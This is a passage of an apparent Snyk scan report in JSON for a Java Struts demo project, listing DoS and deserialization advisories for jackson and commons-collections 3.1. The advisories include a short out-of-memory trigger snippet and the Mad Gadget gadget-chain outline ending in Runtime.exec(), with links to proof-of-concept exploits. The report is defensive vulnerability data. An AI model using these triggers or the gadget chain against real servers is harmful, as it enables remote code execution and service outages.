"primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.091904Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Alessio Soldano" - ], - "semver": { - "vulnerable": [ - "[,2.8.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", - "className": "UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", - "className": "ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/pull/322", - "title": "GitHub PR" - }, - { - "url": "https://issues.jboss.org/browse/JBEAP-6316", - "title": "Jira Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:01.546686Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-01-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:01.546686Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "gmethwin@github" - ], - "semver": { - "vulnerable": [ - "[2.3.0-rc1,2.7.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", - "className": "UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", - "className": "WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-core/issues/315", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:48.004490Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-08-25T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:55:48.004490Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "commons-collections:commons-collections", - "version": "3.1", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "commons-collections:commons-collections", - "version": "3.1", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and 